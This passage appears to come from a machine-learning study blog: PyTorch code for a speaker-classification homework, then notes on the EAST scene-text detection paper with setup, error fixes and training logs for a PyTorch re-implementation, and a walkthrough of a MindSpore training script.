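segment = mel[start:start + segment_len]
print(segment.shape)        # torch.Size([128, 40]) regardless of where start lands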
# --- Dataloader ---
import torch
from torch.utils.data import DataLoader, random_split
from torch.nn.utils.rnn import pad_sequence


def collate_batch(batch):
    """Collate a batch of data."""
    mel, speaker = zip(*batch)
    # Because we train the model batch by batch, features in the same batch must be
    # padded to the same length. pad_sequence automatically pads the shorter mel
    # features with the padding value, so variable-length utterances can form one batch.
    mel = pad_sequence(mel, batch_first=True, padding_value=-20)  # pad log 10^(-20), a very small value
    # mel: (batch size, length, 40)
    return mel, torch.FloatTensor(speaker).long()


def get_dataloader(data_dir, batch_size, n_workers):
    """
    Generate dataloaders.
    data_dir: dataset path
    batch_size: batch size
    n_workers: number of worker processes for loading data
    """
    dataset = myDataset(data_dir)
    speaker_num = dataset.get_speaker_number()
    # Split the dataset 90/10 into train/validation.
    trainlen = int(0.9 * len(dataset))
    lengths = [trainlen, len(dataset) - trainlen]
    trainset, validset = random_split(dataset, lengths)

    train_loader = DataLoader(
        trainset,                  # the training split
        batch_size=batch_size,     # size of each batch
        shuffle=True,              # shuffle the training data
        num_workers=n_workers,     # CPU workers used for loading
        drop_last=True,            # drop the last batch if it is smaller than batch_size
        pin_memory=True,           # pin host memory to speed up host-to-GPU transfer
        collate_fn=collate_batch,  # batch and pad the samples; implemented by collate_batch
    )
    valid_loader = DataLoader(
        validset,
        batch_size=batch_size,
        num_workers=n_workers,
        drop_last=True,
        pin_memory=True,
        collate_fn=collate_batch,
    )

    return train_loader, valid_loader, speaker_num
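To see what collate_batch actually produces, here is a minimal standalone check (the feature width 40 and padding value -20 match the code above):

import torch
from torch.nn.utils.rnn import pad_sequence

# Two fake mel features with different lengths (frames x 40 bins).
a = torch.zeros(5, 40)
b = torch.zeros(3, 40)
batch = pad_sequence([a, b], batch_first=True, padding_value=-20)
print(batch.shape)      # torch.Size([2, 5, 40]): padded to the longest utterance
print(batch[1, 3:, 0])  # tensor([-20., -20.]): the padded frames are filled with -20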
# --- Model ---
!pip install conformer
import torch
import torch.nn as nn
import torch.nn.functional as F
from conformer import ConformerBlock

class Classifier(nn.Module):
    def __init__(self, d_model=256, n_spks=600, dropout=0.2):
        """
        A speaker classifier that assigns an utterance to one of the speakers.
        d_model is the feature dimension, n_spks the number of speakers,
        dropout the dropout probability.
        """
        super().__init__()
        # Prenet: a fully connected layer that projects the 40-dim input mel
        # features into a d_model-dim representation.
        self.prenet = nn.Linear(40, d_model)

        # self.encoder_layer = nn.TransformerEncoderLayer(
        #     d_model=d_model, dim_feedforward=256, nhead=2
        # )
        # self.encoder = nn.TransformerEncoder(self.encoder_layer, num_layers=2)
        # A plain Transformer underperforms here; Conformer works better.

        # Encoder: a ConformerBlock that encodes the prenet output into a
        # representation suitable for classification. On top of multi-head
        # self-attention it adds depthwise-separable convolution, stacking
        # nonlinear transforms to extract more abstract features.
        self.encoder = ConformerBlock(
            dim=d_model,
            dim_head=4,
            heads=4,                  # number of attention heads
            ff_mult=4,                # expansion multiplier in the feed-forward network
            conv_expansion_factor=2,  # expansion multiplier in the convolution module
            conv_kernel_size=20,
            attn_dropout=dropout,     # attention dropout
            ff_dropout=dropout,       # feed-forward dropout
            conv_dropout=dropout,     # convolution dropout
        )

        # Pred_layer: a fully connected network that projects the d_model-dim
        # features onto the n_spks speaker classes.
        self.pred_layer = nn.Sequential(
            nn.BatchNorm1d(d_model),      # batch-normalize the pooled features
            nn.Linear(d_model, d_model),  # two linear layers map down to an n_spks-dim vector
            nn.Sigmoid(),                 # squash each dimension into [0, 1]
            nn.Linear(d_model, n_spks),   # the final linear layer outputs the class scores
        )

    def forward(self, mels):
        """
        args:
            mels: (batch size, length, 40)
        return:
            out: (batch size, n_spks)
        """
        # First project the input mels through the prenet.
        # out: (batch size, length, d_model)
        out = self.prenet(mels)
        # Swap the first two dims to (length, batch size, d_model),
        # the layout this encoder is fed with.
        out = out.permute(1, 0, 2)
        # Encode. The ConformerBlock augments self-attention with
        # depthwise-separable convolution and position-wise feed-forward
        # blocks, better capturing the temporal structure of speech.
        # out keeps the shape (length, batch size, d_model).
        out = self.encoder(out)
        # Swap the dims back to (batch size, length, d_model).
        out = out.transpose(0, 1)
        # Mean pooling over time: stats has shape (batch size, d_model) and is
        # the average feature vector of each utterance in the batch.
        stats = out.mean(dim=1)
        # Project the pooled statistics onto the speakers.
        # out: (batch, n_spks), a score for each speaker per utterance.
        out = self.pred_layer(stats)
        return out
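A quick shape check of the classifier; a minimal sketch, assuming the conformer package from the block above is installed:

model = Classifier(d_model=256, n_spks=600)
model.eval()                      # use running batch-norm stats for a deterministic pass
dummy = torch.randn(4, 128, 40)   # (batch, frames, mel bins)
out = model(dummy)
print(out.shape)                  # torch.Size([4, 600]): one score per speaker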
import math

import torch
from torch.optim import Optimizer
from torch.optim.lr_scheduler import LambdaLR  # note: the schedule is built on LambdaLR

# Learning-rate schedule: linear warmup followed by cosine decay.
def get_cosine_schedule_with_warmup(
    optimizer: Optimizer,    # the optimizer whose learning rate is scheduled
    num_warmup_steps: int,   # warmup length: steps over which the lr ramps up before training proper
    num_training_steps: int, # total number of training steps
    num_cycles: float = 0.5, # number of cosine cycles; the default 0.5 gives one half-wave over the decay
    last_epoch: int = -1,    # optional: the starting epoch when resuming
):
    def lr_lambda(current_step):
        # Warmup: for the first num_warmup_steps the lr increases linearly
        # (small early learning rates help avoid exploding or vanishing gradients).
        if current_step < num_warmup_steps:
            return float(current_step) / float(max(1, num_warmup_steps))
        # Decay: over the remaining steps the lr follows a cosine curve down to 0.
        progress = float(current_step - num_warmup_steps) / float(
            max(1, num_training_steps - num_warmup_steps)
        )
        return max(
            0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress))
        )

    # Wrap lr_lambda in LambdaLR and return it for scheduling during training.
    return LambdaLR(optimizer, lr_lambda, last_epoch)
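A minimal sketch of how this scheduler is meant to be driven (the placeholder model and the step counts are illustrative; the 1000/70000 values match the hyperparameters used later):

import torch
from torch.optim import AdamW

model = torch.nn.Linear(40, 600)  # placeholder model
optimizer = AdamW(model.parameters(), lr=1e-3)
scheduler = get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=1000, num_training_steps=70000)

for step in range(3):
    optimizer.step()                # update the weights first (loss.backward() omitted here)
    scheduler.step()                # then advance the schedule, once per training step
    print(scheduler.get_last_lr())  # the lr ramps linearly from 0 toward 1e-3 during warmup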
# Training helpers
import torch

def model_fn(batch, model, criterion, device):
    """Forward a batch through the model."""
    # model.train()
    # Unpack the batch and move it to the device.
    mels, labels = batch
    mels = mels.to(device)
    labels = labels.to(device)
    # Compute the loss.
    outs = model(mels)
    loss = criterion(outs, labels)
    # Take the speaker ID with the highest probability.
    preds = outs.argmax(1)
    # Compute the accuracy.
    accuracy = torch.mean((preds == labels).float())

    return loss, accuracy
# Validation
from tqdm import tqdm
import torch


def valid(dataloader, model, criterion, device):
    """Validate on the validation set."""

    model.eval()
    running_loss = 0.0
    running_accuracy = 0.0
    pbar = tqdm(total=len(dataloader.dataset), ncols=0, desc="Valid", unit=" uttr")

    for i, batch in enumerate(dataloader):
        with torch.no_grad():
            loss, accuracy = model_fn(batch, model, criterion, device)
            running_loss += loss.item()
            running_accuracy += accuracy.item()

        pbar.update(dataloader.batch_size)
        pbar.set_postfix(
            loss=f"{running_loss / (i+1):.2f}",
            accuracy=f"{running_accuracy / (i+1):.2f}",
        )

    pbar.close()
    model.train()

    return running_accuracy / len(dataloader)
from tqdm import tqdm
import torch
import torch.nn as nn
from torch.optim import AdamW
from torch.utils.data import DataLoader, random_split


def parse_args():
    # Hyperparameters.
    config = {
        "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
        "save_path": "/kaggle/working/model.ckpt",
        "batch_size": 32,
        "n_workers": 8,
        "valid_steps": 2000,
        "warmup_steps": 1000,
        "save_steps": 10000,
        "total_steps": 70000,
    }

    return config


def main(
    data_dir,
    save_path,
    batch_size,
    n_workers,
    valid_steps,
    warmup_steps,
    total_steps,
    save_steps,
):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    train_loader, valid_loader, speaker_num = get_dataloader(data_dir, batch_size, n_workers)
    train_iterator = iter(train_loader)
    print("[Info]: Finish loading data!", flush=True)

    # Define the model, the loss, the optimizer, and the lr schedule.
    model = Classifier(n_spks=speaker_num).to(device)
    criterion = nn.CrossEntropyLoss()
    optimizer = AdamW(model.parameters(), lr=1e-3)
    scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)
    print("[Info]: Finish creating model!", flush=True)

    # Resume from a previously trained checkpoint.
    model.load_state_dict(torch.load("/kaggle/input/hw4model3/model (3).ckpt"))

    best_accuracy = -1.0
    best_state_dict = None

    pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")
    for step in range(total_steps):
        # Get data; restart the iterator when the loader is exhausted.
        try:
            batch = next(train_iterator)
        except StopIteration:
            train_iterator = iter(train_loader)
            batch = next(train_iterator)

        loss, accuracy = model_fn(batch, model, criterion, device)
        batch_loss = loss.item()
        batch_accuracy = accuracy.item()

        # Update the model.
        loss.backward()
        optimizer.step()
        scheduler.step()
        optimizer.zero_grad()

        # Log.
        pbar.update()
        pbar.set_postfix(
            loss=f"{batch_loss:.2f}",
            accuracy=f"{batch_accuracy:.2f}",
            step=step + 1,
        )

        # Do validation.
        if (step + 1) % valid_steps == 0:
            pbar.close()

            valid_accuracy = valid(valid_loader, model, criterion, device)

            # Keep the best model.
            if valid_accuracy > best_accuracy:
                best_accuracy = valid_accuracy
                best_state_dict = model.state_dict()

            pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")

        # Save the best model so far.
        if (step + 1) % save_steps == 0 and best_state_dict is not None:
            torch.save(best_state_dict, save_path)
            pbar.write(f"Step {step + 1}, best model saved. (accuracy={best_accuracy:.4f})")

    pbar.close()


if __name__ == "__main__":
    main(**parse_args())
import json
import csv
from pathlib import Path
from tqdm.notebook import tqdm

import torch
from torch.utils.data import DataLoader

def parse_args():
    """Arguments."""
    config = {
        "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
        "model_path": "/kaggle/working/model.ckpt",
        "output_path": "/kaggle/working/output.csv",
    }

    return config


def main(
    data_dir,
    model_path,
    output_path,
):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    mapping_path = Path(data_dir) / "mapping.json"
    mapping = json.load(mapping_path.open())

    dataset = InferenceDataset(data_dir)
    dataloader = DataLoader(
        dataset,
        batch_size=1,
        shuffle=False,
        drop_last=False,
        num_workers=8,
        collate_fn=inference_collate_batch,
    )
    print("[Info]: Finish loading data!", flush=True)

    speaker_num = len(mapping["id2speaker"])
    model = Classifier(n_spks=speaker_num).to(device)
    model.load_state_dict(torch.load(model_path))
    model.eval()
    print("[Info]: Finish creating model!", flush=True)

    results = [["Id", "Category"]]
    for feat_paths, mels in tqdm(dataloader):
        with torch.no_grad():
            mels = mels.to(device)
            outs = model(mels)
            preds = outs.argmax(1).cpu().numpy()
            for feat_path, pred in zip(feat_paths, preds):
                results.append([feat_path, mapping["id2speaker"][str(pred)]])

    with open(output_path, 'w', newline='') as csvfile:
        writer = csv.writer(csvfile)
        writer.writerows(results)


if __name__ == "__main__":
    main(**parse_args())
# --- Now for the submission: the inference dataset ---
import os
import json
import torch
from pathlib import Path
from torch.utils.data import Dataset


class InferenceDataset(Dataset):
    def __init__(self, data_dir):
        testdata_path = Path(data_dir) / "testdata.json"
        metadata = json.load(testdata_path.open())
        self.data_dir = data_dir
        self.data = metadata["utterances"]

    def __len__(self):
        return len(self.data)

    def __getitem__(self, index):
        utterance = self.data[index]
        feat_path = utterance["feature_path"]
        mel = torch.load(os.path.join(self.data_dir, feat_path))

        return feat_path, mel


def inference_collate_batch(batch):
    """Collate a batch of data."""
    feat_paths, mels = zip(*batch)

    return feat_paths, torch.stack(mels)

Paper: EAST: An Efficient and Accurate Scene Text Detector

Resources

Main text

The model directly predicts words or text lines of arbitrary orientation and quadrilateral shape in full images with a single neural network, eliminating unnecessary intermediate steps (such as candidate aggregation and word partitioning). It performs very well on ICDAR 2015, COCO-Text, and MSRA-TD500!

Text detection is a prerequisite for the downstream steps; the core problem is designing features that distinguish text from background.

The paper proposes a fast and accurate scene-text detection pipeline: a single **fully convolutional network (FCN)** produces word- or text-line-level predictions, cutting out redundant and slow intermediate steps. The generated text predictions, either rotated rectangles or quadrilaterals, are sent to **Non-Maximum Suppression (NMS)** to produce the final result.

EAST, since it is an Efficient and Accuracy Scene Text detection pipeline.

(figure: the EAST network architecture)

• Feature extractor stem (PVANet)

  • The stem can be a convolutional network pre-trained on ImageNet, with interleaved convolution and pooling layers. Four levels of feature maps are extracted from the stem, denoted $f_i$, whose sizes are $\frac{1}{32},\frac{1}{16},\frac{1}{8}$ and $\frac{1}{4}$ of the input image respectively.

• Feature-merging branch

  • The feature maps are merged gradually (concat):

    $g_i=\begin{cases}\mathrm{unpool}(h_i) & \text{if } i\le 3\\\mathrm{conv}_{3\times3}(h_i) & \text{if } i=4\end{cases}$

    $h_i=\begin{cases}f_i & \text{if } i=1\\\mathrm{conv}_{3\times3}(\mathrm{conv}_{1\times1}([g_{i-1};f_i])) & \text{otherwise}\end{cases}$

    • $g_i$ is the merge base

    • $h_i$ is the merged feature map

    • the operator $[\cdot;\cdot]$ denotes concatenation along the channel axis

  • In each merging stage, the feature map from the last stage is first fed to an unpooling layer to double its size, then concatenated with the current feature map.

  • $\mathrm{conv}_{1\times1}$ reduces the number of channels and the computation

  • $\mathrm{conv}_{3\times3}$ fuses the information and produces the output of this merging stage

  • After the last merging stage, a $\mathrm{conv}_{3\times3}$ layer produces the final feature map of the merging branch and feeds it to the output layer.

• Output layer

  • Two geometry shapes for text regions are experimented with:

    • Rotated box (RBOX)
      • 4 channels of axis-aligned bounding box (AABB) $\mathbf R$
      • 1 channel of rotation angle $\theta$
    • Quadrangle (QUAD)
      • 8 numbers represent the coordinate offsets from the four corner vertices $\{p_i\,|\,i\in\{1,2,3,4\}\}$ of the quadrangle to the pixel location; since each offset contains two numbers $(\Delta x_i,\Delta y_i)$, the geometry output has 8 channels.

• Different loss functions are designed for the two geometries (a sketch of the RBOX case follows this section):

  • $L=L_s+\lambda_g L_g$

    • $L_s$ is the loss of the score map, $L_s=\mathrm{balanced\text{-}xent}(\hat{\mathbf{Y}},\mathbf{Y}^*)=-\beta\mathbf{Y}^*\log\hat{\mathbf{Y}}-(1-\beta)(1-\mathbf{Y}^*)\log(1-\hat{\mathbf{Y}})$

      • $\hat{\mathbf{Y}}=F_s$ is the prediction of the score map
      • $\mathbf Y^*$ is the ground truth
      • $\beta$ is the balancing factor between positive and negative samples, $\beta=1-\frac{\sum_{y^*\in\mathbf Y^*}y^*}{|\mathbf Y^*|}$

    • $L_g$ is the loss of the geometry; using a plain $L_1$ or $L_2$ directly would bias the loss toward larger and longer text regions.

      • For RBOX regression: $L_g=L_{AABB}+\lambda_\theta L_\theta$, with $\lambda_\theta$ set to 10

        • The AABB part uses an IoU loss: $L_{AABB}=-\log\mathrm{IoU}(\hat{\mathbf{R}},\mathbf R^*)=-\log\frac{|\hat{\mathbf{R}}\cap \mathbf R^*|}{|\hat{\mathbf{R}}\cup \mathbf R^*|}$

        • Rotation-angle loss: $L_\theta(\hat\theta,\theta^*)=1-\cos(\hat\theta-\theta^*)$

      • QUAD regression uses a scale-normalized smooth $L_1$ loss: $L_g=L_{QUAD}(\hat{\mathbf{Q}},\mathbf Q^*)$

    • $\lambda_g$ weighs the two losses against each other and is set to 1.

• Several $\mathrm{conv}_{1\times1}$ operations project the 32-channel feature map into a 1-channel score map $F_s$ and a multi-channel geometry map $F_g$; the geometry output is either RBOX or QUAD.

A threshold is applied to each predicted region: geometries whose score exceeds a predefined threshold are considered valid and kept for the later non-maximum suppression. The results after NMS are the final output of the pipeline. ADAM optimizer, batch=24.

NMS: assuming that the geometries of nearby pixels tend to be highly correlated, the geometries are merged row by row; while merging geometries in the same row, the geometry currently encountered is iteratively merged with the last merged one. This improved technique runs in $O(n)$ in the best case. Although its worst case is the same as the naive one, as long as the locality assumption holds the algorithm runs fast enough in practice (a sketch of the row-merging idea follows below).
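As a concrete reading of the RBOX loss above, a minimal PyTorch sketch; the decomposition into four AABB distances plus an angle follows the EastLossBlock shown later in the MindSpore section, but the tensor names are my own:

import torch

def rbox_loss(geo_pred, geo_gt, score_gt, lambda_theta=10.0):
    """geo_*: (N, 5, H, W) = 4 AABB distances + angle; score_gt: (N, 1, H, W) text mask."""
    d1p, d2p, d3p, d4p, theta_p = torch.split(geo_pred, 1, dim=1)
    d1g, d2g, d3g, d4g, theta_g = torch.split(geo_gt, 1, dim=1)
    area_g = (d1g + d3g) * (d2g + d4g)
    area_p = (d1p + d3p) * (d2p + d4p)
    w_union = torch.min(d2g, d2p) + torch.min(d4g, d4p)
    h_union = torch.min(d1g, d1p) + torch.min(d3g, d3p)
    inter = w_union * h_union
    union = area_g + area_p - inter
    l_aabb = -torch.log((inter + 1.0) / (union + 1.0))  # IoU loss, L_AABB
    l_theta = 1 - torch.cos(theta_p - theta_g)          # angle loss, L_theta
    # Average over the positive (text) pixels only.
    pos = score_gt.sum().clamp(min=1.0)
    return ((l_aabb + lambda_theta * l_theta) * score_gt).sum() / pos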

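And a hedged Python sketch of the locality-aware row merging; weighted_merge and the crude bounding-box IoU are my simplifications of the idea, the production implementation is the lanms package used later:

import numpy as np

def bbox_iou(g, p):
    """Crude IoU on the axis-aligned bounding boxes of two quads (8 coords + score)."""
    gx, gy = g[0:8:2], g[1:8:2]
    px, py = p[0:8:2], p[1:8:2]
    ix = max(0.0, min(gx.max(), px.max()) - max(gx.min(), px.min()))
    iy = max(0.0, min(gy.max(), py.max()) - max(gy.min(), py.min()))
    inter = ix * iy
    union = (gx.max() - gx.min()) * (gy.max() - gy.min()) \
        + (px.max() - px.min()) * (py.max() - py.min()) - inter
    return inter / union if union > 0 else 0.0

def weighted_merge(g, p):
    """Merge two quads, weighting the coordinates by their scores."""
    q = np.zeros(9)
    q[:8] = (g[8] * g[:8] + p[8] * p[:8]) / (g[8] + p[8])
    q[8] = g[8] + p[8]
    return q

def locality_aware_merge(polys, thresh=0.3):
    """Row-major scan: keep merging the current quad into the last merged one
    while they overlap; standard NMS then runs on the (much smaller) survivors."""
    merged, last = [], None
    for g in polys:  # polys assumed sorted in row-major order
        if last is not None and bbox_iou(g, last) > thresh:
            last = weighted_merge(g, last)
        else:
            if last is not None:
                merged.append(last)
            last = g
    if last is not None:
        merged.append(last)
    return merged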
Possible directions for future research include:

• adapting the geometry formulation to allow direct detection of curved text;
• integrating the detector with a text recognizer;
• extending the idea to general object detection.

Code

PyTorch

Windows

1. SakuraRiven/EAST: PyTorch Re-Implementation of EAST: An Efficient and Accurate Scene Text Detector (github.com): clone the repository.

(figure: loading the project)

2. Create a new EAST environment in conda (conda create -n east python=3.7) and install:

   • pytorch
   • shapely
   • opencv-python 4.0.0.21
   • lanms, which is notoriously hard to install; use pip install lanms-neo==1.0.2 -i https://pypi.tuna.tsinghua.edu.cn/simple
     • on WSL2 Ubuntu, use pip install lanms-proper instead

   Then set up the interpreter.

(figure: setting the interpreter)

3. Download the models: VGG16 and EAST, and put them in the pths/ folder.

(figure: downloading and placing the pretrained models)

4. Download the ICDAR 2015 Challenge 4 dataset from Downloads - Incidental Scene Text - Robust Reading Competition (uab.es), unzip it, and place it in the corresponding folders (the original project keeps the data outside the project tree; I moved it inside).

(figure: the dataset website)

(figure: the four downloaded archives)

(figure: setting the dataset paths)

(figure: modifying the paths)

5. Run detect.py.

(figure: prediction results)

6. Run train.py! Greeted by an error: UnicodeDecodeError: 'gbk' codec can't decode byte 0xbf in position 2: illegal multibyte sequence. Fix: in dataset.py, line 382, change with open(self.gt_files[index], 'r') as f: to with open(self.gt_files[index], 'r', encoding='utf-8') as f:.

7. Run train.py again! Next error: torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.50 GiB (GPU 0; 8.00 GiB total capacity; 3.14 GiB already allocated; 2.79 GiB free; 3.15 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation. See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF. Fix: in train.py, change batch_size = 24 to batch_size = 4.

8. Run train.py once more. It trains!

WSL2

Set up the environment:

conda create -n EAST python=3.7
conda activate EAST
pip install shapely
pip install opencv-python==4.0.0.21
pip install lanms-proper

Run it!

python3 train.py

First error:

  File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
ImportError: libSM.so.6: cannot open shared object file: No such file or directory

Fix:

sudo apt update
sudo apt install libsm6

Next error:

Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
Please make sure libcudnn_cnn_infer.so.8 is in your library path!

Install cuDNN:

sudo apt install nvidia-cuda-toolkit

Run it again!

    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

MindSpore

Reading the code

train.py

Looks much like any other train.py: set all the parameters, load the model and optimizer, and start training.

The details all live in src/.

from src.util import AverageMeter, get_param_groups
from src.east import EAST, EastWithLossCell
from src.logger import get_logger
from src.initializer import default_recurisive_init
from src.dataset import create_east_dataset
from src.lr_scheduler import get_lr

These imports pull in everything the script needs:

• src.util: AverageMeter() and get_param_groups(), for running averages and for collecting the network's trainable parameters.
• src.east: the EAST class and EastWithLossCell, the model and the model-plus-loss wrapper.
• src.logger: get_logger(), which builds the logger.
• src.initializer: default_recurisive_init() (sic), the default recursive initializer for the EAST model.
• src.dataset: create_east_dataset(), which builds the EAST dataset.
• src.lr_scheduler: get_lr(), which returns the learning rate for the current epoch.

The script proceeds as follows:

1. Set up the parser variables

2. Set up the distributed-computation parameters

3. Set up the ModelArts-related parameters

4. Set up the relevant paths (dataset, log output)

5. Code-acceleration options

6. Load the model

7. Set up the optimizer

8. Start training


It first uses the argparse module to create an ArgumentParser object that parses the command-line arguments.

ArgumentParser('mindspore icdar training'): creates an ArgumentParser object with 'mindspore icdar training' as the program description.

Parser variables

Device:

| name | type | default | help |
| --- | --- | --- | --- |
| --device_target | str | Ascend | device where the code will be implemented. |
| --device_id | int | 0 | device id where the model will be implemented. |

Dataset:

| name | type | default | help |
| --- | --- | --- | --- |
| --data_dir | str | './data/icdar2015/Training/' | Train dataset directory. |
| --per_batch_size | int | 8 | Batch size for Training. |
| --outputs_dir | str | 'outputs/' | output dir. |

Network:

| name | type | default | help |
| --- | --- | --- | --- |
| --pretrained_backbone | str | './data/vgg/XXX.ckpt' | The ckpt file of ResNet. |
| --resume_east | str | | The ckpt file of EAST, used for fine-tuning. |

Optimizer and learning rate:

| name | type | default | help |
| --- | --- | --- | --- |
| --lr_scheduler | str | 'my_lr' | Learning rate scheduler, options: exponential (exponential decay), cosine_annealing (cosine annealing). Default: cosine_annealing |
| --lr | float | 0.001 | Learning rate. |
| --per_step | float | 2 | Learning rate change times. |
| --lr_gamma | float | 0.1 | Decrease lr by a factor of the exponential lr_scheduler. |
| --eta_min | float | 0. | Eta_min in cosine_annealing scheduler. |
| --t_max | int | 100 | T-max in cosine_annealing scheduler. |
| --max_epoch | int | 600 | Max epoch num to train the model. |
| --warmup_epochs | float(?) | 6 | Warmup epochs. |
| --weight_decay | float | 0.0005 | Weight decay factor. |

Loss:

| name | type | default | help |
| --- | --- | --- | --- |
| --loss_scale | int | 1 | Static loss scale. |
| --resume_east | str | 7,7 | Epochs at which the lr changes, split with "," |

Logging:

| name | type | default | help |
| --- | --- | --- | --- |
| --log_interval | int | 10 | Logging interval steps. |
| --ckpt_path | str | 'outputs/' | Checkpoint save location. |
| --ckpt_interval | int | 1000 (huge!) | Save checkpoint interval. |
| --is_save_on_master | int | 1 | Save ckpt on master or all rank, 1 for master, 0 for all ranks. (master and rank relate to distributed training) |

Distributed computation:

| name | type | default | help |
| --- | --- | --- | --- |
| --is_distributed | int | 0 | Distribute train or not, 1 for yes, 0 for no. |
| --rank | int | 0 | Local rank of distributed. |
| --group_size | int | 1 | World size of device. |

Profiler:

| name | type | default | help |
| --- | --- | --- | --- |
| --need_profiler | int | 0 | Whether use profiler. 0 for no, 1 for yes. |

ModelArts:

| name | type | default | help |
| --- | --- | --- | --- |
| --is_modelArts | int | 0 | Training in modelArts or not, 1 for yes, 0 for no. |

Distributed computation

This block sets the parameters for MindSpore's distributed computation; I leave it alone.

args, _ = parser.parse_known_args()
args.device_id = int(os.getenv("DEVICE_ID", "0"))
args.rank = args.device_id

ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
                                 device_num=args.group_size)

ModelArts

ModelArts-related parameters; oddly it still runs with this set to 0.

This block handles the data and model paths when running on Huawei Cloud's ModelArts platform. If args.is_modelArts is True, the program is running on ModelArts and the storage paths need rewriting. The moxing library, Huawei Cloud's Python SDK for ModelArts, provides APIs for reading and writing data and for uploading and downloading files. The local data and checkpoint paths are derived from the current process's rank (args.rank); the pretrained backbone is renamed to the local checkpoint path; mox.file.copy_parallel() copies the data from the remote path (args.data_dir) to the local data path; and the output path (args.outputs_dir) is redirected under /cache, since on ModelArts program outputs must live under /cache to be persisted.

if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)

Paths

Set the relevant paths (dataset, logs):

args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

# Use the current process's rank (args.rank) as a subdirectory of the output folder
outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
# Then append the current time as another subdirectory
args.outputs_dir = os.path.join(
    args.outputs_dir,
    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
args.logger = get_logger(args.outputs_dir, args.rank)  # create a logger that writes under args.outputs_dir
args.logger.save_args(args)  # save all arguments into the log file

if __name__ == "__main__":  # the rest of the script runs under the main guard

Optimization

Code-acceleration setup:

if args.need_profiler:
    # Create a profiler and save its results under args.outputs_dir
    profiler = Profiler(
        output_path=args.outputs_dir,
        is_detail=True,
        is_show_op_path=True)

# An AverageMeter to track the running average of the loss for later logging
loss_meter = AverageMeter('loss')

# Reset the auto-parallel context
context.reset_auto_parallel_context()
parallel_mode = ParallelMode.STAND_ALONE
degree = 1
# Distributed computation again...
if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)

Loading the model

network = EAST()  # instantiate the EAST model
# default is kaiming-normal
default_recurisive_init(network)  # default recursive init of the EAST model (He normal)

# load pretrained_backbone
if args.pretrained_backbone:  # if not None, load the pretrained backbone
    parm_dict = load_checkpoint(args.pretrained_backbone)  # load the parameters
